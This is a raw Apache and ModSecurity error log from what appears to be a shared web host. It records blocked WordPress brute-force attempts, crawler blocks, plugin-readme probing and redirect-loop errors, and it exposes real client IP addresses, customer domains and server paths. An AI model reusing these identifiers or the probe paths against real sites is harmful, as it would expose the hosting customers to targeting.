[Tue May 26 18:08:54.063087 2026] [core:error] [pid 960743:tid 960887] [client 161.35.150.254:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://www.rakeshdewan.com/
[Tue May 26 18:08:54.063115 2026] [core:error] [pid 960743:tid 960887] [client 161.35.150.254:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://www.rakeshdewan.com/
[Tue May 26 18:08:55.223523 2026] [security2:error] [pid 960743:tid 960888] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWUXvQvEln_BHBy2zKRIgAAAJQ"]
[Tue May 26 18:08:57.351382 2026] [security2:error] [pid 960743:tid 960912] [client 82.76.238.33:58279] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.238.76.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWUYfQvEln_BHBy2zKRagAAAKw"]
[Tue May 26 18:08:57.351509 2026] [security2:error] [pid 960743:tid 960912] [client 82.76.238.33:58279] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWUYfQvEln_BHBy2zKRagAAAKw"]
[Tue May 26 18:08:57.715309 2026] [security2:error] [pid 960743:tid 960933] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWUYfQvEln_BHBy2zKRbQAAAME"]
[Tue May 26 18:08:57.807672 2026] [security2:error] [pid 960743:tid 960899] [client 202.76.169.85:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWUYfQvEln_BHBy2zKRdQAAAJ8"]
[Tue May 26 18:08:58.237578 2026] [core:error] [pid 960743:tid 960898] [client 161.35.150.254:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://www.rakeshdewan.com/
[Tue May 26 18:08:58.237602 2026] [core:error] [pid 960743:tid 960898] [client 161.35.150.254:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://www.rakeshdewan.com/
[Tue May 26 18:09:00.260363 2026] [security2:error] [pid 960743:tid 960900] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWUY_QvEln_BHBy2zKRwwAAAKA"]
[Tue May 26 18:09:00.911587 2026] [security2:error] [pid 960743:tid 960903] [client 85.208.96.197:55396] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.anujtradingco.com"] [uri "/robots.txt"] [unique_id "ahWUZPQvEln_BHBy2zKR3QAAAKM"]
[Tue May 26 18:09:00.911773 2026] [security2:error] [pid 960743:tid 960903] [client 85.208.96.197:55396] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.anujtradingco.com"] [uri "/robots.txt"] [unique_id "ahWUZPQvEln_BHBy2zKR3QAAAKM"]
[Tue May 26 18:09:01.459450 2026] [security2:error] [pid 960743:tid 960890] [client 85.208.96.204:16620] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.anujtradingco.com"] [uri "/top-deejay-headphones/"] [unique_id "ahWUZfQvEln_BHBy2zKR7gAAAJY"]
[Tue May 26 18:09:01.459577 2026] [security2:error] [pid 960743:tid 960890] [client 85.208.96.204:16620] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.anujtradingco.com"] [uri "/top-deejay-headphones/"] [unique_id "ahWUZfQvEln_BHBy2zKR7gAAAJY"]
[Tue May 26 18:09:02.213063 2026] [security2:error] [pid 960743:tid 960841] [remote 66.240.195.150:56111] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 150.195.240.66.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWUZvQvEln_BHBy2zKSAwAAxWE"]
[Tue May 26 18:09:02.604460 2026] [security2:error] [pid 960743:tid 960759] [remote 66.240.195.150:56111] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 150.195.240.66.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWUZvQvEln_BHBy2zKSGwAA9w8"], referer: https://preetishah.moes-art.com/wp-login.php
[Tue May 26 18:09:03.500629 2026] [security2:error] [pid 960743:tid 960902] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWUZ_QvEln_BHBy2zKSLQAAAKI"]
[Tue May 26 18:09:04.132583 2026] [security2:error] [pid 960743:tid 960994] [client 185.192.70.94:35349] ModSecurity: Access denied with code 406 (phase 1). Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "655"] [id "900155"] [msg "WP Brute UA block"] [hostname "autodiscover.gcirsm.org.in"] [uri "/blog/wp-admin/"] [unique_id "ahWUaPQvEln_BHBy2zKSRAAAAP4"]
[Tue May 26 18:09:06.019093 2026] [security2:error] [pid 960743:tid 960891] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWUafQvEln_BHBy2zKSYwAAAJc"]
[Tue May 26 18:09:07.692563 2026] [security2:error] [pid 960743:tid 960966] [client 82.76.238.33:58711] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.238.76.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWUa_QvEln_BHBy2zKSpAAAAOI"]
[Tue May 26 18:09:07.692756 2026] [security2:error] [pid 960743:tid 960966] [client 82.76.238.33:58711] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWUa_QvEln_BHBy2zKSpAAAAOI"]
[Tue May 26 18:09:08.095319 2026] [security2:error] [pid 960743:tid 960881] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWUa_QvEln_BHBy2zKSowAAAI0"]
[Tue May 26 18:09:08.191335 2026] [security2:error] [pid 960743:tid 960969] [client 45.61.187.62:65285] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.187.61.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.cti.hn"] [uri "/wp-login.php"] [unique_id "ahWUa_QvEln_BHBy2zKSqgAAAOU"]
[Tue May 26 18:09:11.102555 2026] [security2:error] [pid 960743:tid 960927] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWUbvQvEln_BHBy2zKTBQAAALs"]
[Tue May 26 18:09:11.582204 2026] [security2:error] [pid 960743:tid 960910] [client 195.178.110.204:43706] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "208.91.198.65"] [uri "/index.cgi"] [unique_id "ahWUb_QvEln_BHBy2zKTJAAAAKo"]
[Tue May 26 18:09:14.097577 2026] [security2:error] [pid 960743:tid 960893] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWUcfQvEln_BHBy2zKTZgAAAJk"]
[Tue May 26 18:09:15.900986 2026] [security2:error] [pid 960743:tid 960937] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWUc_QvEln_BHBy2zKTmQAAAMU"]
[Tue May 26 18:09:18.608655 2026] [security2:error] [pid 960743:tid 960935] [client 82.76.238.33:59148] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.238.76.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWUdvQvEln_BHBy2zKT9QAAAMM"]
[Tue May 26 18:09:18.608801 2026] [security2:error] [pid 960743:tid 960935] [client 82.76.238.33:59148] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWUdvQvEln_BHBy2zKT9QAAAMM"]
[Tue May 26 18:09:19.206088 2026] [security2:error] [pid 960743:tid 960922] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWUdvQvEln_BHBy2zKT9AAAALY"]
[Tue May 26 18:09:20.550569 2026] [security2:error] [pid 960743:tid 960809] [remote 50.6.207.27:33056] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 27.207.6.50.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWUePQvEln_BHBy2zKUMQAA-kE"]
[Tue May 26 18:09:21.108335 2026] [security2:error] [pid 960743:tid 960844] [remote 148.113.128.201:53734] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "eco-green.com.mx"] [uri "/robots.txt"] [unique_id "ahWUefQvEln_BHBy2zKUTQAA0WQ"]
[Tue May 26 18:09:21.108568 2026] [security2:error] [pid 960743:tid 960949] [client 148.113.128.201:53734] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "eco-green.com.mx"] [uri "/robots.txt"] [unique_id "ahWUefQvEln_BHBy2zKUTQAA0WQ"]
[Tue May 26 18:09:21.460339 2026] [security2:error] [pid 960743:tid 960814] [remote 50.6.207.27:33056] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 27.207.6.50.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWUefQvEln_BHBy2zKUYgAAzkY"], referer: https://canopykaapi.com/wp-login.php
[Tue May 26 18:09:21.553315 2026] [security2:error] [pid 960743:tid 960922] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWUefQvEln_BHBy2zKUTwAAALY"]
[Tue May 26 18:09:22.554539 2026] [security2:error] [pid 960743:tid 960821] [remote 54.39.0.64:62508] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "eco-green.com.mx"] [uri "/"] [unique_id "ahWUevQvEln_BHBy2zKUfwAAt00"]
[Tue May 26 18:09:22.554850 2026] [security2:error] [pid 960743:tid 960923] [client 54.39.0.64:62508] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "eco-green.com.mx"] [uri "/"] [unique_id "ahWUevQvEln_BHBy2zKUfwAAt00"]
[Tue May 26 18:09:24.186209 2026] [security2:error] [pid 960743:tid 960997] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWUe_QvEln_BHBy2zKUowAAAQE"]
[Tue May 26 18:09:26.009185 2026] [security2:error] [pid 960743:tid 960849] [remote 178.156.182.155:37354] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 155.182.156.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWUffQvEln_BHBy2zKU6gAA1mk"]
[Tue May 26 18:09:26.986846 2026] [security2:error] [pid 960743:tid 960977] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWUfvQvEln_BHBy2zKU_gAAAO0"]
[Tue May 26 18:09:27.850348 2026] [security2:error] [pid 960743:tid 960856] [remote 111.229.141.137:55208] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 137.141.229.111.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "tea.canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWUf_QvEln_BHBy2zKVKAAAqnA"]
[Tue May 26 18:09:28.884181 2026] [security2:error] [pid 960743:tid 961000] [client 82.76.238.33:59608] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.238.76.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWUgPQvEln_BHBy2zKVTQAAAQQ"]
[Tue May 26 18:09:28.884359 2026] [security2:error] [pid 960743:tid 961000] [client 82.76.238.33:59608] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWUgPQvEln_BHBy2zKVTQAAAQQ"]
[Tue May 26 18:09:28.902725 2026] [security2:error] [pid 960743:tid 960875] [client 103.100.234.128:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWUgPQvEln_BHBy2zKVRgAAAIc"]
[Tue May 26 18:09:29.561248 2026] [autoindex:error] [pid 960743:tid 960995] [client 43.136.167.197:0] AH01276: Cannot serve directory /home2/glorolle/public_html/juniorwoodies.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://www.juniorwoodies.com
[Tue May 26 18:09:30.146639 2026] [security2:error] [pid 960743:tid 960920] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWUgfQvEln_BHBy2zKVdQAAALQ"]
[Tue May 26 18:09:32.065968 2026] [security2:error] [pid 960743:tid 960943] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWUg_QvEln_BHBy2zKVugAAAMs"]
[Tue May 26 18:09:32.299594 2026] [security2:error] [pid 960743:tid 960871] [remote 5.42.158.148:60898] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.158.42.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWUhPQvEln_BHBy2zKVzAAA138"]
[Tue May 26 18:09:32.810527 2026] [security2:error] [pid 960743:tid 960956] [client 107.174.169.203:42046] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatchFromFile sitelock.txt" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "398"] [id "900247"] [msg "Wordpress Plugin README.txt file access attempt"] [hostname "kurgu-afrika.com"] [uri "/cgi-sys/suspendedpage.cgi/wp-content/plugins/worker/readme.txt"] [unique_id "ahWUhPQvEln_BHBy2zKV4gAAANg"], referer: https://www.google.com/
[Tue May 26 18:09:33.121418 2026] [security2:error] [pid 960743:tid 960942] [client 66.249.64.173:35348] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahWUg_QvEln_BHBy2zKVwQAAAMo"], referer: https://doyecpa.com/prizes/135229652%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20class=
[Tue May 26 18:09:33.258133 2026] [security2:error] [pid 960743:tid 960922] [client 107.174.169.203:6052] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatchFromFile sitelock.txt" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "398"] [id "900247"] [msg "Wordpress Plugin README.txt file access attempt"] [hostname "kurgu-afrika.com"] [uri "/cgi-sys/suspendedpage.cgi/wp-content/plugins/mainwp-child/readme.txt"] [unique_id "ahWUhfQvEln_BHBy2zKV7wAAALY"], referer: https://www.google.com/
[Tue May 26 18:09:33.699412 2026] [security2:error] [pid 960743:tid 960902] [client 107.174.169.203:27098] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatchFromFile sitelock.txt" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "398"] [id "900247"] [msg "Wordpress Plugin README.txt file access attempt"] [hostname "kurgu-afrika.com"] [uri "/cgi-sys/suspendedpage.cgi/wp-content/plugins/iwp-client/readme.txt"] [unique_id "ahWUhfQvEln_BHBy2zKWAwAAAKI"], referer: https://www.google.com/
[Tue May 26 18:09:34.145233 2026] [security2:error] [pid 960743:tid 960880] [client 107.174.169.203:40703] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatchFromFile sitelock.txt" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "398"] [id "900247"] [msg "Wordpress Plugin README.txt file access attempt"] [hostname "kurgu-afrika.com"] [uri "/cgi-sys/suspendedpage.cgi/wp-content/plugins/vaultpress/readme.txt"] [unique_id "ahWUhvQvEln_BHBy2zKWFwAAAIw"], referer: https://www.google.com/
[Tue May 26 18:09:34.935143 2026] [security2:error] [pid 960743:tid 960969] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWUhvQvEln_BHBy2zKWJAAAAOU"]
[Tue May 26 18:09:35.788248 2026] [security2:error] [pid 960743:tid 960912] [client 185.192.70.3:43153] ModSecurity: Access denied with code 406 (phase 1). Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "655"] [id "900155"] [msg "WP Brute UA block"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-admin/images/html-api/"] [unique_id "ahWUh_QvEln_BHBy2zKWTgAAAKw"]
[Tue May 26 18:09:37.171389 2026] [security2:error] [pid 960743:tid 960963] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWUiPQvEln_BHBy2zKWZwAAAN8"]
[Tue May 26 18:09:39.000751 2026] [security2:error] [pid 960743:tid 960883] [client 82.76.238.33:60040] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.238.76.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWUi_QvEln_BHBy2zKWqgAAAI8"]
[Tue May 26 18:09:39.000865 2026] [security2:error] [pid 960743:tid 960883] [client 82.76.238.33:60040] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWUi_QvEln_BHBy2zKWqgAAAI8"]
[Tue May 26 18:09:39.783440 2026] [security2:error] [pid 960743:tid 960763] [remote 14.161.17.36:38696] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 36.17.161.14.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWUi_QvEln_BHBy2zKWvQAAzRM"]
[Tue May 26 18:09:39.836359 2026] [security2:error] [pid 960743:tid 960959] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWUi_QvEln_BHBy2zKWuQAAANs"]
[Tue May 26 18:09:40.953571 2026] [security2:error] [pid 960743:tid 960838] [remote 31.24.44.107:34754] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.44.24.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWUjPQvEln_BHBy2zKW4QAA3l4"]
[Tue May 26 18:09:41.154425 2026] [security2:error] [pid 960743:tid 960951] [client 74.7.244.45:53318] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.dolibarrtraining.azurmediatec.com"] [uri "/robots.txt"] [unique_id "ahWUjfQvEln_BHBy2zKW6wAA0xg"]
[Tue May 26 18:09:41.524296 2026] [security2:error] [pid 960743:tid 960765] [remote 31.24.44.107:34754] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.44.24.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWUjfQvEln_BHBy2zKW8gAA1RU"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:09:42.466810 2026] [security2:error] [pid 960743:tid 960959] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWUjvQvEln_BHBy2zKXBAAAANs"]
